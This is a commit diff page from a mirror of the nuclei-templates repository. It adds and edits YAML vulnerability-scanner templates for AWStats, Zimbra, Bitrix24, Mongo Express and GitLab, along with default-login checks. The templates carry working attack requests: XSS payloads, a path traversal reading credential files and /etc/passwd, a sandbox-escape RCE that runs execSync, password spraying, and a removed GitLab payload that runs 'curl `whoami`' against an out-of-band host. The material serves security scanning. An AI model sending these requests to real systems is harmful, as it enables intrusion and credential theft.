daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'origin/master' into credentials-disclosure

patch-1
forgedhallpass 2022-01-21 16:02:06 +02:00
parent 02c0417190 8a3e575e9f
commit 840f25137e
31 changed files with 1969 additions and 1274 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 955 | daffainfo | 529 | cves | 961 | info | 991 | http | 2660 | | cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
| lfi | 400 | dhiyaneshdk | 360 | exposed-panels | 381 | high | 730 | file | 57 | | lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
| panel | 383 | pikpikcu | 295 | vulnerabilities | 377 | medium | 544 | network | 48 | | panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
| xss | 296 | pdteam | 240 | technologies | 214 | critical | 353 | dns | 16 | | xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | | | wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
| exposure | 273 | dwisiswant0 | 159 | workflows | 182 | | | | | | exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
| rce | 251 | gy741 | 98 | misconfiguration | 182 | | | | | | rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | | | tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
| cve2021 | 211 | 0x_akoko | 94 | default-logins | 67 | | | | | | cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | | | wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
**203 directories, 2995 files**. **203 directories, 3004 files**.
</td> </td>
</tr> </tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

2406
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

14
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 955 | daffainfo | 529 | cves | 961 | info | 991 | http | 2660 | | cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
| lfi | 400 | dhiyaneshdk | 360 | exposed-panels | 381 | high | 730 | file | 57 | | lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
| panel | 383 | pikpikcu | 295 | vulnerabilities | 377 | medium | 544 | network | 48 | | panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
| xss | 296 | pdteam | 240 | technologies | 214 | critical | 353 | dns | 16 | | xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | | | wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
| exposure | 273 | dwisiswant0 | 159 | workflows | 182 | | | | | | exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
| rce | 251 | gy741 | 98 | misconfiguration | 182 | | | | | | rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | | | tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
| cve2021 | 211 | 0x_akoko | 94 | default-logins | 67 | | | | | | cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | | | wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |

28
cves/2009/CVE-2009-5020.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2009-5020
info:
name: AWStats < 6.95 - Open redirect
author: pdteam
severity: medium
description: Open redirect vulnerability in awredir.pl in AWStats before 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
reference: https://nvd.nist.gov/vuln/detail/CVE-2009-5020
tags: cve,cve2020,redirect,awstats
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2009-5020
cwe-id: CWE-601
requests:
- method: GET
path:
- '{{BaseURL}}/awstats/awredir.pl?url=example.com'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

34
cves/2012/CVE-2012-4547.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2012-4547
info:
name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
reference:
- https://www.exploit-db.com/exploits/36164
- https://nvd.nist.gov/vuln/detail/CVE-2012-4547
tags: cve,cve2020,xss,awstats
requests:
- method: GET
path:
- '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

36
cves/2013/CVE-2013-7091.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2013-7091
info:
name: Zimbra Collaboration Server 7.2.2/8.0.2 LFI
author: rubina119
severity: critical
description: Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-7091
- https://www.exploit-db.com/exploits/30085
- https://www.exploit-db.com/exploits/30472
tags: cve,cve2013,zimbra,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "zimbra_server_hostname"
- "zimbra_ldap_userdn"
- "zimbra_ldap_password"
- "ldap_postfix_password"
- "ldap_amavis_password"
- "ldap_nginx_password"
- "mysql_root_password"
condition: or
- type: regex
regex:
- "root=.*:0:0"

18
cves/2020/CVE-2020-13483.yaml
View File

@ -2,34 +2,40 @@ id: CVE-2020-13483
info: info:
name: Bitrix24 through 20.0.0 allows XSS name: Bitrix24 through 20.0.0 allows XSS
author: pikpikcu author: pikpikcu,3th1c_yuk1
severity: medium severity: medium
reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
tags: cve,cve2020,xss,bitrix reference:
- https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
- https://twitter.com/brutelogic/status/1483073170827628547
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10 cvss-score: 6.10
cve-id: CVE-2020-13483 cve-id: CVE-2020-13483
cwe-id: CWE-79 cwe-id: CWE-79
tags: cve,cve2020,xss,bitrix
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words:
- "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
part: body part: body
words:
- '<a href="/*">*/)});function __MobileAppList(){alert(1)}//'
- "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
condition: or
- type: word - type: word
part: header
words: words:
- text/html - text/html
part: header
- type: status - type: status
status: status:

51
cves/2020/CVE-2020-24391.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2020-24391
info:
name: Mongo Express Remote Code Execution
author: leovalcante
severity: critical
description: Mongo-express uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to RCE in the context of the node server.
reference:
- https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/
- https://nvd.nist.gov/vuln/detail/CVE-2020-24391
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-24391
tags: cve,cve2020,mongo,express,rce,intrusive
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /checkValid HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
- |
GET /public/css/{{randstr}}.css HTTP/1.1
Host: {{Hostname}}
req-condition: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body_3
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

143
cves/2021/CVE-2021-22205.yaml
View File

@ -1,63 +1,128 @@
id: CVE-2021-22205 id: CVE-2021-22205
info: info:
name: GitLab CE/EE Unauthenticated RCE using ExifTool name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection
author: pdteam author: GitLab Red Team
severity: critical severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
reference: reference:
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
- https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542 - https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205 - https://nvd.nist.gov/vuln/detail/CVE-2021-22205
tags: cve,cve2021,gitlab,rce,oast
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90 cvss-score: 9.90
cve-id: CVE-2021-22205 cve-id: CVE-2021-22205
cwe-id: CWE-20 cwe-id: CWE-20
tags: cve,cve2021,gitlab,rce
requests: requests:
- raw: - method: GET
- | path:
GET /users/sign_in HTTP/1.1 - "{{BaseURL}}/users/sign_in"
Host: {{Hostname}}
Origin: {{BaseURL}}
- | redirects: true
POST /uploads/user HTTP/1.1 max-redirects: 3
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
cookie-reuse: true
matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- 'Failed to process image' - "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
- type: word - "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
part: interactsh_protocol # Confirms the DNS Interaction - "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
words: - "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
- "dns" - "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753"
- "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f"
- type: status - "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4"
status: - "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4"
- 422 - "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6"
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
- "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369"
- "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae"
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
- "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2"
- "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1"
- "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac"
- "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86"
- "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087"
- "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86"
- "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d"
- "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd"
- "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514"
- "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09"
- "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e"
- "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb"
- "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3"
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
- "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b"
- "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44"
- "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117"
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
- "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e"
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
- "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb"
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
- "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf"
- "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71"
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
- "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a"
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
- "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2"
- "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca"
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
- "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b"
- "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5"
- "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d"
- "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f"
- "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab"
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
- "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9"
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
- "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1"
- "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b"
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
- "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b"
- "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e"
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
- "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b"
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
- "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445"
- "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca"
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
- "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7"
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
- "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c"
- "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f"
- "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56"
- "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3"
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
- "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0"
- "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687"
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
- "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd"
- "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83"
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
- "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649"
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
condition: or
extractors: extractors:
- type: regex - type: regex
name: csrf-token
internal: true
group: 1 group: 1
regex: regex:
- 'csrf-token" content="(.*?)" />\n\n<meta' - '(?:application-)(\S{64})(?:\.css)'
- type: regex
name: whoami
part: interactsh_request
group: 1
regex:
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'

3
cves/2021/CVE-2021-44528.yaml
View File

@ -7,12 +7,13 @@ info:
description: Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. description: Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.
reference: reference:
- https://seclists.org/oss-sec/2021/q4/att-160/7-0-host-authorzation-open-redirect.patch - https://seclists.org/oss-sec/2021/q4/att-160/7-0-host-authorzation-open-redirect.patch
tags: cve,cve2021,redirect - https://nvd.nist.gov/vuln/detail/CVE-2021-44528
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10 cvss-score: 6.10
cve-id: CVE-2021-44528 cve-id: CVE-2021-44528
cwe-id: CWE-601 cwe-id: CWE-601
tags: cve,cve2021,redirect
requests: requests:
- raw: - raw:

46
default-logins/gophish/gophish-default-login.yaml Normal file
View File

@ -0,0 +1,46 @@
id: gophish-default-login
info:
name: Gophish < v0.10.1 default credentials
author: arcc,dhiyaneshDK
severity: high
tags: gophish,default-login
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}&csrf_token={{replace(url_encode(html_unescape(csrf_token)), "+", "%2B")}}
attack: pitchfork
payloads:
user:
- admin
pass:
- gophish
cookie-reuse: true
extractors:
- type: regex
name: csrf_token
part: body
internal: true
group: 1
regex:
- 'name="csrf_token" value="(.+?)"'
matchers:
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'location: /login')"
- "contains(tolower(all_headers), 'location: /')"
- "contains(tolower(all_headers), 'gophish')"
- "status_code==302"
condition: and

38
default-logins/jboss/jmx-default-login.yaml Normal file
View File

@ -0,0 +1,38 @@
id: jmx-default-login
info:
name: JBoss JMX Console Weak Credential
author: paradessia
severity: high
tags: jboss,jmx,default-login
requests:
- raw:
- |
GET /jmx-console/ HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(user + ':' + pass)}}
attack: clusterbomb
payloads:
user:
- admin
- root
pass:
- admin
- 12345
- 123456
- 1234
- 123456789
- 123qwe
- root
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'JMImplementation'

46
default-logins/versa/versa-default-login.yaml Normal file
View File

@ -0,0 +1,46 @@
id: versa-default-login
info:
name: Versa Networks SD-WAN Application Default Login
author: davidmckennirey
severity: high
description: Searches for default admin credentials for the Versa Networks SD-WAN application.
tags: default-login,versa,sdwan
requests:
- raw:
- |
GET /versa/login.html HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
- |
POST /versa/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}&sso=systemRadio
attack: pitchfork
payloads:
user:
- Administrator
pass:
- versa123
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_2 == 302'
- "contains(tolower(all_headers_2), 'jsessionid')"
- "contains(tolower(all_headers_2), 'location: /versa/index.html')"
condition: and
- type: dsl
dsl:
- "contains(tolower(all_headers_2), '/login?error=true')"
- "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')"
negative: true

22
exposed-panels/code42-panel.yaml Normal file
View File

@ -0,0 +1,22 @@
id: code42-panel
info:
name: Code42 Panel
author: Adam Crosser
severity: info
tags: panel,code42
requests:
- method: GET
path:
- '{{BaseURL}}/404'
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- type: word
words:
- "<a href=\"https://code42.com\">Code42 homepage</a>"

33
exposed-panels/concrete5/concrete5-install.yaml Normal file
View File

@ -0,0 +1,33 @@
id: concrete5-install
info:
name: Concrete5 Install Panel
author: osamahamad,princechaddha
severity: critical
reference: https://documentation.concretecms.org/developers/introduction/installing-concrete-cms
metadata:
shodan-query: http.title:"Install concrete5"
tags: panel,concrete,cms
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/install"
- "{{BaseURL}}/concrete5/index.php/install"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
